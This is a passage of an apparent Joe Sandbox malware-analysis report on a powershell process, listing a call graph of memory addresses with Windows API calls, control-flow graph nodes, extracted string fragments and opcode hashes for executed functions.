148233->148236 148234 29dd000 148234->148203 148235->148234 148236->148234 148239 29dce4c 148237->148239 148238 29dce9c 148238->148203 148239->148238 148240 29dd158 IdentifyCodeAuthzLevelW 148239->148240 148241 29dd168 IdentifyCodeAuthzLevelW 148239->148241 148240->148238 148241->148238 148248 29dd590 148242->148248 148246 29dd176 148245->148246 148247 29dd590 IdentifyCodeAuthzLevelW 148245->148247 148246->148218 148247->148246 148249 29dd595 148248->148249 148250 29dd827 IdentifyCodeAuthzLevelW 148249->148250 148251 29dd877 148250->148251 148253 8336538 148252->148253 148262 8335f68 148253->148262 148269 8335f59 148253->148269 148258 8336556 148257->148258 148260 8335f59 3 API calls 148258->148260 148261 8335f68 3 API calls 148258->148261 148259 833656c 148259->148173 148260->148259 148261->148259 148277 8335ec0 148262->148277 148282 8335ed0 148262->148282 148263 8335f91 148287 8334b28 148263->148287 148292 8334b1a 148263->148292 148270 8335f68 148269->148270 148273 8335ed0 IdentifyCodeAuthzLevelW 148270->148273 148274 8335ec0 IdentifyCodeAuthzLevelW 148270->148274 148271 8335f91 148275 8334b1a 2 API calls 148271->148275 148276 8334b28 2 API calls 148271->148276 148272 8335fa6 148272->148173 148273->148271 148274->148271 148275->148272 148276->148272 148278 8335ed0 148277->148278 148279 8335f23 148278->148279 148297 8335b39 148278->148297 148302 8335b48 148278->148302 148279->148263 148283 8335f23 148282->148283 148284 8335edf 148282->148284 148283->148263 148284->148283 148285 8335b39 IdentifyCodeAuthzLevelW 148284->148285 148286 8335b48 IdentifyCodeAuthzLevelW 148284->148286 148285->148283 148286->148283 148288 8334b76 148287->148288 148307 8334540 148288->148307 148312 833452f 148288->148312 148289 8334d1b 148293 8334b28 148292->148293 148295 8334540 2 API calls 148293->148295 148296 833452f 2 API calls 148293->148296 148294 8334d1b 148295->148294 148296->148294 148298 8335b48 148297->148298 148299 8335be4 148298->148299 148300 29dc7b8 IdentifyCodeAuthzLevelW 148298->148300 148301 29dc7c8 IdentifyCodeAuthzLevelW 148298->148301 148299->148279 148300->148299 148301->148299 148303 8335b6d 148302->148303 148304 8335be4 148302->148304 148305 29dc7b8 IdentifyCodeAuthzLevelW 148303->148305 148306 29dc7c8 IdentifyCodeAuthzLevelW 148303->148306 148304->148279 148305->148304 148306->148304 148308 8334558 148307->148308 148317 83344b8 148308->148317 148322 83344a8 148308->148322 148309 8334571 148309->148289 148313 8334558 148312->148313 148315 83344b8 2 API calls 148313->148315 148316 83344a8 2 API calls 148313->148316 148314 8334571 148314->148289 148315->148314 148316->148314 148318 83344cc 148317->148318 148327 8334210 148318->148327 148331 83341fc 148318->148331 148319 8334520 148319->148309 148323 83344cc 148322->148323 148325 8334210 2 API calls 148323->148325 148326 83341fc 2 API calls 148323->148326 148324 8334520 148324->148309 148325->148324 148326->148324 148328 8334238 148327->148328 148329 83342d0 148328->148329 148335 83341d2 148328->148335 148329->148319 148332 8334238 148331->148332 148333 83342d0 148332->148333 148334 83341d2 2 API calls 148332->148334 148333->148319 148334->148333 148336 83341e3 148335->148336 148337 83341d8 148335->148337 148336->148329 148338 83340aa GetFileAttributesW SetThreadUILanguage 148337->148338 148338->148336 148339 8135518 148340 813554c 148339->148340 148341 8135583 148340->148341 148346 8135eb1 148340->148346 148352 8135ec0 148340->148352 148342 81359f3 148341->148342 148357 815dd84 148341->148357 148347 8135e61 148346->148347 148348 8135ebe 148346->148348 148347->148341 148361 8135db8 148348->148361 148366 8135da8 148348->148366 148349 8135f05 148349->148349 148353 8135eed 148352->148353 148355 8135db8 IdentifyCodeAuthzLevelW 148353->148355 148356 8135da8 IdentifyCodeAuthzLevelW 148353->148356 148354 8135f05 148354->148354 148355->148354 148356->148354 148371 815d4c0 148357->148371 148375 815d4a9 148357->148375 148358 815dd91 148362 8135e0f 148361->148362 148363 8135de1 148361->148363 148362->148349 148363->148362 148364 29dc7b8 IdentifyCodeAuthzLevelW 148363->148364 148365 29dc7c8 IdentifyCodeAuthzLevelW 148363->148365 148364->148362 148365->148362 148367 8135db8 148366->148367 148368 8135e0f 148367->148368 148369 29dc7b8 IdentifyCodeAuthzLevelW 148367->148369 148370 29dc7c8 IdentifyCodeAuthzLevelW 148367->148370 148368->148349 148369->148368 148370->148368 148372 815d4d2 148371->148372 148373 815d4dc 148371->148373 148372->148373 148379 815d43b 148372->148379 148373->148358 148376 815d4d2 148375->148376 148377 815d4dc 148375->148377 148376->148377 148378 815d43b 2 API calls 148376->148378 148377->148358 148378->148377 148383 81362e0 148379->148383 148392 81362f0 148379->148392 148380 815d446 148380->148373 148384 813657b 148383->148384 148385 8136319 148383->148385 148386 8136396 148385->148386 148401 8138350 148385->148401 148410 8137c10 148385->148410 148420 8138340 148385->148420 148430 813834e 148385->148430 148439 8137c20 148385->148439 148386->148380 148393 813657b 148392->148393 148394 8136319 148392->148394 148395 8136396 148394->148395 148396 8138350 2 API calls 148394->148396 148397 8138340 2 API calls 148394->148397 148398 8137c10 2 API calls 148394->148398 148399 8137c20 2 API calls 148394->148399 148400 813834e 2 API calls 148394->148400 148395->148380 148396->148395 148397->148395 148398->148395 148399->148395 148400->148395 148404 8138378 148401->148404 148402 81384ee 148454 8139e39 148402->148454 148464 8139f27 148402->148464 148469 8139c80 148402->148469 148479 8139c90 148402->148479 148404->148402 148450 8136b74 148404->148450 148414 8137c20 148410->148414 148411 8137c41 148411->148386 148412 81384ee 148416 8139c90 2 API calls 148412->148416 148417 8139c80 2 API calls 148412->148417 148418 8139f27 2 API calls 148412->148418 148419 8139e39 2 API calls 148412->148419 148413 8136b74 SetThreadUILanguage 148413->148412 148414->148411 148414->148412 148414->148413 148415 8138508 148416->148415 148417->148415 148418->148415 148419->148415 148421 813834a 148420->148421 148422 81383b7 148420->148422 148421->148386 148423 81384ee 148422->148423 148424 8136b74 SetThreadUILanguage 148422->148424 148426 8139c90 2 API calls 148423->148426 148427 8139c80 2 API calls 148423->148427 148428 8139f27 2 API calls 148423->148428 148429 8139e39 2 API calls 148423->148429 148424->148423 148425 8138508 148426->148425 148427->148425 148428->148425 148429->148425 148431 8138378 148430->148431 148432 8136b74 SetThreadUILanguage 148431->148432 148433 81384ee 148431->148433 148432->148433 148435 8139c90 2 API calls 148433->148435 148436 8139c80 2 API calls 148433->148436 148437 8139f27 2 API calls 148433->148437 148438 8139e39 2 API calls 148433->148438 148434 8138508 148435->148434 148436->148434 148437->148434 148438->148434 148440 8137c41 148439->148440 148444 8137c4b 148439->148444 148440->148386 148441 8137ff4 148441->148386 148442 81384ee 148446 8139c90 2 API calls 148442->148446 148447 8139c80 2 API calls 148442->148447 148448 8139f27 2 API calls 148442->148448 148449 8139e39 2 API calls 148442->148449 148443 8136b74 SetThreadUILanguage 148443->148442 148444->148441 148444->148442 148444->148443 148445 8138508 148446->148445 148447->148445 148448->148445 148449->148445 148451 8138c60 SetThreadUILanguage 148450->148451 148453 8138cd1 148451->148453 148453->148402 148455 8139e47 148454->148455 148489 813bbbf 148455->148489 148493 813bd5d 148455->148493 148497 813b9f8 148455->148497 148501 813b9e8 148455->148501 148456 8139f1f 148505 8286c58 148456->148505 148513 8286c48 148456->148513 148457 813a243 148465 8139f39 148464->148465 148467 8286c48 2 API calls 148465->148467 148468 8286c58 2 API calls 148465->148468 148466 813a243 148467->148466 148468->148466 148470 8139ccc 148469->148470 148475 813b9f8 2 API calls 148470->148475 148476 813b9e8 2 API calls 148470->148476 148477 813bbbf 2 API calls 148470->148477 148478 813bd5d 2 API calls 148470->148478 148471 8139f1f 148473 8286c48 2 API calls 148471->148473 148474 8286c58 2 API calls 148471->148474 148472 813a243 148473->148472 148474->148472 148475->148471 148476->148471 148477->148471 148478->148471 148480 8139ccc 148479->148480 148483 813b9f8 2 API calls 148480->148483 148484 813b9e8 2 API calls 148480->148484 148485 813bbbf 2 API calls 148480->148485 148486 813bd5d 2 API calls 148480->148486 148481 8139f1f 148487 8286c48 2 API calls 148481->148487 148488 8286c58 2 API calls 148481->148488 148482 813a243 148483->148481 148484->148481 148485->148481 148486->148481 148487->148482 148488->148482 148490 813ba6f 148489->148490 148491 813bd48 148490->148491 148521 813c8c8 148490->148521 148491->148456 148494 813bd48 148493->148494 148495 813ba6f 148493->148495 148494->148456 148495->148494 148496 813c8c8 2 API calls 148495->148496 148496->148495 148498 813bd48 148497->148498 148499 813ba21 148497->148499 148498->148456 148499->148498 148500 813c8c8 2 API calls 148499->148500 148500->148499 148502 813ba21 148501->148502 148503 813bd48 148501->148503 148502->148503 148504 813c8c8 2 API calls 148502->148504 148503->148456 148504->148502 148506 8286c6a 148505->148506 148507 8286c6f 148506->148507 148599 8286122 148506->148599 148507->148457 148508 8286d79 148607 82b6759 148508->148607 148612 82b6768 148508->148612 148617 82b67f7 148508->148617 148514 8286c4d 148513->148514 148516 8286c6f 148514->148516 148520 8286122 2 API calls 148514->148520 148515 8286d79 148517 82b6759 2 API calls 148515->148517 148518 82b6768 2 API calls 148515->148518 148519 82b67f7 2 API calls 148515->148519 148516->148457 148517->148516 148518->148516 148519->148516 148520->148515 148522 813c8d9 148521->148522 148523 813cadd 148522->148523 148524 813c907 148522->148524 148525 813c9a6 148523->148525 148548 828bde8 148523->148548 148554 828bdd9 148523->148554 148524->148525 148531 820500a 148524->148531 148537 8204f88 148524->148537 148543 82050a8 148524->148543 148525->148490 148533 8205012 148531->148533 148532 820501d 148532->148525 148533->148532 148560 8205990 148533->148560 148570 8205971 148533->148570 148534 82050f7 148534->148525 148538 820501d 148537->148538 148539 8204fc1 148537->148539 148538->148525 148539->148538 148541 8205990 GetFileAttributesW 148539->148541 148542 8205971 GetFileAttributesW 148539->148542 148540 82050f7 148540->148525 148541->148540 148542->148540 148544 82050b9 148543->148544 148546 8205990 GetFileAttributesW 148544->148546 148547 8205971 GetFileAttributesW 148544->148547 148545 82050f7 148545->148525 148546->148545 148547->148545 148549 828be03 148548->148549 148551 828be3f 148549->148551 148580 828c440 148549->148580 148589 828c431 148549->148589 148550 828c35d 148550->148525 148551->148525 148555 828bde8 148554->148555 148556 828be3f 148555->148556 148558 828c440 2 API calls 148555->148558 148559 828c431 2 API calls 148555->148559 148556->148525 148557 828c35d 148557->148525 148558->148557 148559->148557 148561 82059c0 148560->148561 148562 82059c4 148561->148562 148564 8206464 148561->148564 148567 8332e77 GetFileAttributesW 148561->148567 148568 8332e48 GetFileAttributesW 148561->148568 148569 8332e88 GetFileAttributesW 148561->148569 148562->148534 148563 8206495 148563->148534 148564->148563 148565 82064c0 GetFileAttributesW 148564->148565 148566 82064b4 GetFileAttributesW 148564->148566 148565->148563 148566->148563 148567->148564 148568->148564 148569->148564 148573 8205990 148570->148573 148571 8206495 148571->148534 148572 8206464 148572->148571 148575 82064c0 GetFileAttributesW 148572->148575 148576 82064b4 GetFileAttributesW 148572->148576 148573->148572 148574 82059c4 148573->148574 148577 8332e77 GetFileAttributesW 148573->148577 148578 8332e48 GetFileAttributesW 148573->148578 148579 8332e88 GetFileAttributesW 148573->148579 148574->148534 148575->148571 148576->148571 148577->148572 148578->148572 148579->148572 148584 828cd78 GetFileAttributesW SetThreadUILanguage 148580->148584 148585 828cd6c GetFileAttributesW SetThreadUILanguage 148580->148585 148586 828caa0 GetFileAttributesW SetThreadUILanguage 148580->148586 148587 828cab0 GetFileAttributesW SetThreadUILanguage 148580->148587 148588 828cc41 GetFileAttributesW SetThreadUILanguage 148580->148588 148581 828c462 148583 828ea75 GetFileAttributesW SetThreadUILanguage 148581->148583 148582 828c474 148582->148550 148583->148582 148584->148581 148585->148581 148586->148581 148587->148581 148588->148581 148590 828c440 148589->148590 148593 828cd78 GetFileAttributesW SetThreadUILanguage 148590->148593 148594 828cd6c GetFileAttributesW SetThreadUILanguage 148590->148594 148595 828caa0 GetFileAttributesW SetThreadUILanguage 148590->148595 148596 828cab0 GetFileAttributesW SetThreadUILanguage 148590->148596 148597 828cc41 GetFileAttributesW SetThreadUILanguage 148590->148597 148591 828c462 148598 828ea75 GetFileAttributesW SetThreadUILanguage 148591->148598 148592 828c474 148592->148550 148593->148591 148594->148591 148595->148591 148596->148591 148597->148591 148598->148592 148600 828612e 148599->148600 148602 8286569 148599->148602 148601 8286527 148600->148601 148600->148602 148622 8284a20 148600->148622 148629 8284a10 148600->148629 148601->148602 148636 82b8fe8 148601->148636 148641 82b90f5 148601->148641 148602->148508 148609 82b6768 148607->148609 148608 82b69f7 148608->148507 148609->148608 148678 82b6221 148609->148678 148683 82b6230 148609->148683 148613 82b69f7 148612->148613 148614 82b6793 148612->148614 148613->148507 148614->148613 148615 82b6221 2 API calls 148614->148615 148616 82b6230 2 API calls 148614->148616 148615->148614 148616->148614 148618 82b679d 148617->148618 148619 82b69f7 148618->148619 148620 82b6221 2 API calls 148618->148620 148621 82b6230 2 API calls 148618->148621 148619->148507 148620->148618 148621->148618 148623 8284a54 148622->148623 148624 8284a69 148623->148624 148646 8282cb0 148623->148646 148651 828fb37 148623->148651 148657 828fb48 148623->148657 148663 8282cc0 148623->148663 148624->148624 148630 8284a54 148629->148630 148631 828fb48 2 API calls 148630->148631 148632 8284a69 148630->148632 148633 8282cb0 2 API calls 148630->148633 148634 8282cc0 2 API calls 148630->148634 148635 828fb37 2 API calls 148630->148635 148631->148632 148633->148632 148634->148632 148635->148632 148638 82b9010 148636->148638 148637 82b9110 148637->148601 148668 82b8d88 148638->148668 148673 82b8d78 148638->148673 148642 82b90fd 148641->148642 148644 82b8d78 2 API calls 148642->148644 148645 82b8d88 2 API calls 148642->148645 148643 82b9110 148643->148601 148644->148643 148645->148643 148648 8282cb7 148646->148648 148647 8282df4 148647->148647 148649 82b3638 GetFileAttributesW SetThreadUILanguage 148648->148649 148650 82b3624 GetFileAttributesW SetThreadUILanguage 148648->148650 148649->148647 148650->148647 148652 828fb61 148651->148652 148653 828fb7d 148651->148653 148652->148653 148654 828f848 GetFileAttributesW SetThreadUILanguage 148652->148654 148655 828f6c0 GetFileAttributesW SetThreadUILanguage 148652->148655 148656 828f611 GetFileAttributesW SetThreadUILanguage 148652->148656 148653->148624 148654->148652 148655->148652 148656->148652 148658 828fb61 148657->148658 148659 828fb7d 148657->148659 148658->148659 148660 828f848 GetFileAttributesW SetThreadUILanguage 148658->148660 148661 828f6c0 GetFileAttributesW SetThreadUILanguage 148658->148661 148662 828f611 GetFileAttributesW SetThreadUILanguage 148658->148662 148659->148624 148660->148658 148661->148658 148662->148658 148665 8282cd1 148663->148665 148664 8282df4 148664->148664 148666 82b3638 GetFileAttributesW SetThreadUILanguage 148665->148666 148667 82b3624 GetFileAttributesW SetThreadUILanguage 148665->148667 148666->148664 148667->148664 148669 82b8db1 148668->148669 148670 82b8f03 148668->148670 148671 82b868f GetFileAttributesW SetThreadUILanguage 148669->148671 148672 82b86a0 GetFileAttributesW SetThreadUILanguage 148669->148672 148670->148637 148671->148670 148672->148670 148674 82b8f03 148673->148674 148675 82b8db1 148673->148675 148674->148637 148676 82b868f GetFileAttributesW SetThreadUILanguage 148675->148676 148677 82b86a0 GetFileAttributesW SetThreadUILanguage 148675->148677 148676->148674 148677->148674 148679 82b6267 148678->148679 148688 82b5b38 148679->148688 148692 82b5b28 148679->148692 148680 82b62ed 148684 82b6267 148683->148684 148686 82b5b28 2 API calls 148684->148686 148687 82b5b38 2 API calls 148684->148687 148685 82b62ed 148686->148685 148687->148685 148689 82b5b4d 148688->148689 148690 82b5e63 148689->148690 148691 82b578b GetFileAttributesW SetThreadUILanguage 148689->148691 148690->148680 148691->148690 148693 82b5b38 148692->148693 148694 82b5e63 148693->148694 148695 82b578b GetFileAttributesW SetThreadUILanguage 148693->148695 148694->148680 148695->148694 148696 8135d58 148697 8135cfc 148696->148697 148698 8135d09 148697->148698 148699 815dd84 2 API calls 148697->148699 148699->148698 148700 8137bd8 148701 8137c06 148700->148701 148702 8137be4 148700->148702 148702->148701 148703 8138350 2 API calls 148702->148703 148704 8138340 2 API calls 148702->148704 148705 8137c10 2 API calls 148702->148705 148706 8137c20 2 API calls 148702->148706 148707 813834e 2 API calls 148702->148707 148703->148702 148704->148702 148705->148702 148706->148702 148707->148702 148760 833d118 148762 833d130 148760->148762 148761 833d134 148762->148761 148765 8338330 148762->148765 148764 833d21c 148766 8338357 148765->148766 148767 833835b 148766->148767 148770 8341830 148766->148770 148776 8341820 148766->148776 148767->148764 148771 8341846 148770->148771 148773 8341885 148770->148773 148782 81579f0 148771->148782 148791 81579e0 148771->148791 148772 834187d 148772->148767 148773->148767 148777 8341846 148776->148777 148779 8341885 148776->148779 148780 81579f0 GetFileAttributesW 148777->148780 148781 81579e0 GetFileAttributesW 148777->148781 148778 834187d 148778->148767 148779->148767 148780->148778 148781->148778 148783 8157a19 148782->148783 148784 8157a8c 148782->148784 148783->148784 148785 8157a84 148783->148785 148786 81579f0 GetFileAttributesW 148783->148786 148787 81579e0 GetFileAttributesW 148783->148787 148784->148772 148785->148784 148800 810d670 148785->148800 148805 810d78c 148785->148805 148810 810d680 148785->148810 148786->148785 148787->148785 148792 8157a19 148791->148792 148794 8157a8c 148791->148794 148793 8157a84 148792->148793 148792->148794 148795 81579f0 GetFileAttributesW 148792->148795 148796 81579e0 GetFileAttributesW 148792->148796 148793->148794 148797 810d670 GetFileAttributesW 148793->148797 148798 810d680 GetFileAttributesW 148793->148798 148799 810d78c GetFileAttributesW 148793->148799 148794->148772 148795->148793 148796->148793 148797->148794 148798->148794 148799->148794 148801 810d6af 148800->148801 148802 810d76e 148800->148802 148801->148802 148815 81520d8 148801->148815 148819 81520c8 148801->148819 148802->148784 148806 810d76e 148805->148806 148807 810d747 148805->148807 148807->148806 148808 81520d8 GetFileAttributesW 148807->148808 148809 81520c8 GetFileAttributesW 148807->148809 148808->148806 148809->148806 148811 810d6af 148810->148811 148812 810d76e 148810->148812 148811->148812 148813 81520d8 GetFileAttributesW 148811->148813 148814 81520c8 GetFileAttributesW 148811->148814 148812->148784 148813->148812 148814->148812 148817 81520e6 148815->148817 148816 81520f2 148816->148802 148817->148816 148823 815a956 148817->148823 148820 81520d8 148819->148820 148821 81520f2 148820->148821 148822 815a956 GetFileAttributesW 148820->148822 148821->148802 148822->148821 148824 815a95f 148823->148824 148825 815aa21 148824->148825 148828 815b670 148824->148828 148834 815b65c 148824->148834 148829 815b681 148828->148829 148830 815b730 148829->148830 148840 815b7e9 148829->148840 148845 815b7f8 148829->148845 148830->148825 148831 815b7c5 148831->148825 148836 815b670 148834->148836 148835 815b730 148835->148825 148836->148835 148838 815b7e9 GetFileAttributesW 148836->148838 148839 815b7f8 GetFileAttributesW 148836->148839 148837 815b7c5 148837->148825 148838->148837 148839->148837 148841 815b7f8 148840->148841 148849 815b838 148841->148849 148855 815b848 148841->148855 148842 815b816 148842->148831 148847 815b838 GetFileAttributesW 148845->148847 148848 815b848 GetFileAttributesW 148845->148848 148846 815b816 148846->148831 148847->148846 148848->148846 148850 815b848 148849->148850 148851 815bb24 148850->148851 148853 29d4a98 GetFileAttributesW 148850->148853 148854 29d4af8 GetFileAttributesW 148850->148854 148852 815b8b7 148852->148842 148853->148852 148854->148852 148856 815b873 148855->148856 148857 815bb24 148856->148857 148859 29d4a98 GetFileAttributesW 148856->148859 148860 29d4af8 GetFileAttributesW 148856->148860 148858 815b8b7 148858->148842 148859->148858 148860->148858 148861 8154279 148862 8154281 148861->148862 148865 8151798 148862->148865 148867 81517c9 148865->148867 148866 8151947 148867->148866 148872 810e9b5 148867->148872 148877 810e701 148867->148877 148886 810e8a0 148867->148886 148891 810ec49 148867->148891 148873 810e9bd 148872->148873 148896 815acb9 148873->148896 148901 815acc8 148873->148901 148874 810ea32 148878 810e71c 148877->148878 148883 810d670 GetFileAttributesW 148878->148883 148884 810d680 GetFileAttributesW 148878->148884 148885 810d78c GetFileAttributesW 148878->148885 148879 810e89b 148880 810e967 148879->148880 148881 815acb9 GetFileAttributesW 148879->148881 148882 815acc8 GetFileAttributesW 148879->148882 148880->148866 148881->148880 148882->148880 148883->148879 148884->148879 148885->148879 148888 810e8a5 148886->148888 148887 810e967 148887->148866 148888->148887 148889 815acb9 GetFileAttributesW 148888->148889 148890 815acc8 GetFileAttributesW 148888->148890 148889->148887 148890->148887 148892 810e907 148891->148892 148893 810e967 148892->148893 148894 815acb9 GetFileAttributesW 148892->148894 148895 815acc8 GetFileAttributesW 148892->148895 148893->148866 148894->148893 148895->148893 148897 815ad4c 148896->148897 148898 815aced 148896->148898 148897->148874 148898->148897 148906 8159b77 148898->148906 148917 8159b88 148898->148917 148902 815aced 148901->148902 148903 815ad4c 148901->148903 148902->148903 148904 8159b77 GetFileAttributesW 148902->148904 148905 8159b88 GetFileAttributesW 148902->148905 148903->148874 148904->148903 148905->148903 148907 8159b2c 148906->148907 148908 8159b82 148906->148908 148907->148897 148909 8159bdf 148908->148909 148910 8159fc0 148908->148910 148927 8159418 148909->148927 148932 8159420 148909->148932 148911 815a045 148910->148911 148915 8159b77 GetFileAttributesW 148910->148915 148916 8159b88 GetFileAttributesW 148910->148916 148911->148897 148912 8159c3b 148912->148897 148915->148911 148916->148911 148918 8159bae 148917->148918 148919 8159fc0 148918->148919 148920 8159bdf 148918->148920 148921 815a045 148919->148921 148925 8159b77 GetFileAttributesW 148919->148925 148926 8159b88 GetFileAttributesW 148919->148926 148923 8159420 GetFileAttributesW 148920->148923 148924 8159418 GetFileAttributesW 148920->148924 148921->148897 148922 8159c3b 148922->148897 148923->148922 148924->148922 148925->148921 148926->148921 148928 815943b 148927->148928 148929 815949f 148928->148929 148937 81584c0 148928->148937 148944 81585c0 148928->148944 148929->148912 148933 815943b 148932->148933 148934 815949f 148933->148934 148935 81584c0 GetFileAttributesW 148933->148935 148936 81585c0 GetFileAttributesW 148933->148936 148934->148912 148935->148934 148936->148934 148938 81584f2 148937->148938 148939 8158507 148938->148939 148940 8158400 GetFileAttributesW 148938->148940 148941 29d4a98 GetFileAttributesW 148938->148941 148942 81583fc GetFileAttributesW 148938->148942 148951 8158448 148938->148951 148939->148929 148940->148938 148941->148938 148942->148938 148945 81585dd 148944->148945 148946 8158738 148945->148946 148947 8158400 GetFileAttributesW 148945->148947 148948 29d4a98 GetFileAttributesW 148945->148948 148949 81583fc GetFileAttributesW 148945->148949 148950 8158448 GetFileAttributesW 148945->148950 148946->148929 148947->148945 148948->148945 148949->148945 148950->148945 148952 815846c 148951->148952 148953 8158400 GetFileAttributesW 148951->148953 148954 81583fc GetFileAttributesW 148951->148954 148952->148938 148953->148952 148954->148952 148708 29d8f10 148709 29d8f25 148708->148709 148711 29dc7b8 IdentifyCodeAuthzLevelW 148709->148711 148712 29dc7c8 IdentifyCodeAuthzLevelW 148709->148712 148710 29da28c 148711->148710 148712->148710 148999 29ddd60 149000 29ddda6 GetSystemInfo 148999->149000 149001 29dddd6 149000->149001

                                                                                                  Executed Functions

                                                                                                  Function 0833E6D0 Relevance: 8.0, Strings: 6, Instructions: 522COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 833e6d0-833e74b 7 833e74e-833e75c 0->7 9 833e76a-833e773 7->9 10 833e75e-833e768 7->10 11 833e83a-833e84d 9->11 12 833e779-833e7a9 9->12 10->9 18 833e8f3-833e8f5 11->18 19 833e853-833e877 11->19 26 833e7c1-833e835 12->26 27 833e7ab-833e7b1 12->27 22 833e8fd-833e90b 18->22 37 833e879-833e87f 19->37 38 833e88f-833e8e0 19->38 28 833e919-833e922 22->28 29 833e90d-833e917 22->29 84 833ec95-833ec9c 26->84 30 833e7b3 27->30 31 833e7b5-833e7b7 27->31 32 833e9f8-833e9ff 28->32 33 833e928-833e93f 28->33 29->28 30->26 31->26 152 833ea01 call 833a3b0 32->152 153 833ea01 call 833a3a8 32->153 51 833e9c2-833e9f3 33->51 52 833e945-833e964 33->52 40 833e883-833e885 37->40 41 833e881 37->41 85 833e8e6-833e8f1 38->85 86 833ec9d-833ecb4 38->86 40->38 41->38 47 833ea07-833ea0c 49 833ea12-833ea31 47->49 50 833eac1-833eb05 47->50 65 833ea33-833ea39 49->65 66 833ea49-833eabc 49->66 96 833eb13-833eb17 50->96 97 833eb07-833eb11 50->97 51->84 68 833e966-833e96c 52->68 69 833e97c-833e9ba 52->69 70 833ea3b 65->70 71 833ea3d-833ea3f 65->71 66->84 72 833e970-833e972 68->72 73 833e96e 68->73 69->51 70->66 71->66 72->69 73->69 85->22 102 833ecbb-833ecea 86->102 100 833eb21-833eb2b 96->100 101 833eb19 96->101 97->96 104 833eb37-833eb3e 100->104 105 833eb2d-833eb32 100->105 101->100 114 833ecf0-833ed64 102->114 115 833ed6c-833ed70 102->115 107 833eb44-833eb5d 104->107 108 833ec1e-833ec22 104->108 105->7 107->108 124 833eb63-833eb88 107->124 111 833ec61-833ec64 108->111 112 833ec24-833ec2e 108->112 113 833ec67-833ec93 111->113 117 833ec30-833ec35 112->117 118 833ec3d-833ec46 112->118 113->84 114->115 117->118 118->102 119 833ec48-833ec5f 118->119 119->113 136 833eba0-833ec1c 124->136 137 833eb8a-833eb90 124->137 136->84 139 833eb92 137->139 140 833eb94-833eb96 137->140 139->136 140->136 152->47 153->47
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^Et$^Et$^Et$^Et$^Et$k
                                                                                                  • API String ID: 0-1005809038
                                                                                                  • Opcode ID: 4f071e954396f1e2cb5063fe11c95fa3deb578ff3af95e88017adab466604539
                                                                                                  • Instruction ID: 4436551305445528cd25ac3db5c2229da9d9a9716c29bc1f0a60bb67ffa2678c
                                                                                                  • Opcode Fuzzy Hash: 4f071e954396f1e2cb5063fe11c95fa3deb578ff3af95e88017adab466604539
                                                                                                  • Instruction Fuzzy Hash: 8E127A34B006149FDB19EBA9C854AAEBBA6FFC8301B15852DD406EB350DF35ED06CB91
                                                                                                  Function 08205990 Relevance: 4.5, Strings: 3, Instructions: 713COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 530 8205990-82059c2 532 82059c4-82059f3 530->532 533 82059f6-8205a00 530->533 534 8205d26-8205d44 533->534 535 8205a06-8205bb5 533->535 537 8205e39-8205e66 534->537 538 8205d4a-8205e32 534->538 659 8205c45-8205d21 535->659 660 8205bbb-8205bcf 535->660 547 8205f25-8205f76 537->547 548 8205e6c-8205f20 537->548 538->537 569 8206010-82060ca 547->569 570 8205f7c-8205f98 547->570 612 820628f-8206299 548->612 662 8206137-8206268 569->662 663 82060cc-82060d5 569->663 584 820641e-8206428 570->584 585 8205f9e-820600a 570->585 593 8206440-8206445 584->593 594 820642a-820643f 584->594 585->569 585->570 598 8206447-8206449 call 82051e0 593->598 599 820644e-8206454 593->599 594->593 598->599 602 8206464-8206466 599->602 603 8206456-820645a 599->603 605 8206468-8206479 602->605 606 820647b 602->606 603->602 609 820645c 603->609 610 820647d-8206485 605->610 606->610 728 820645e call 8332e77 609->728 729 820645e call 8332e48 609->729 730 820645e call 8332e88 609->730 615 8206497-8206499 610->615 616 8206487-820648b 610->616 617 8206405-8206409 612->617 618 820629f-82062f2 612->618 624 82064a9-82064ae 615->624 625 820649b-820649f 615->625 616->615 622 820648d 616->622 620 8206414-820641b 617->620 621 820640b-8206411 617->621 649 8206321-82063fe 618->649 650 82062f4-820631a 618->650 621->620 724 820648f call 82064c0 622->724 725 820648f call 82064b4 622->725 625->624 628 82064a1 625->628 628->624 630 8206495 630->624 649->617 650->649 659->537 669 8205bd1-8205bdd 660->669 670 8205bdf-8205beb 660->670 662->584 722 820626e-8206287 662->722 663->584 665 82060db-820611d 663->665 726 8206123 call 8204d40 665->726 727 8206123 call 8204d2f 665->727 674 8205bf7-8205c3f 669->674 670->674 674->659 674->660 701 8206129-8206135 701->662 701->663 722->612 724->630 725->630 726->701 727->701 728->602 729->602 730->602
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$fBKt
                                                                                                  • API String ID: 0-2422460936
                                                                                                  • Opcode ID: b951d043cc3aab8914fe39b86a278e079a88e53a27d6fc52a22d020177bc34f5
                                                                                                  • Instruction ID: dcf8c8dccd3290436f303cc886a985b3759263bf8aef7772d918f7ee0515b903
                                                                                                  • Opcode Fuzzy Hash: b951d043cc3aab8914fe39b86a278e079a88e53a27d6fc52a22d020177bc34f5
                                                                                                  • Instruction Fuzzy Hash: 22620574B002158FDB64DF68C854BAEB7B6BF88301F1085A9D40AEB395DB359E82CF51
                                                                                                  Function 081C6538 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: |@Et
                                                                                                  • API String ID: 0-2857452445
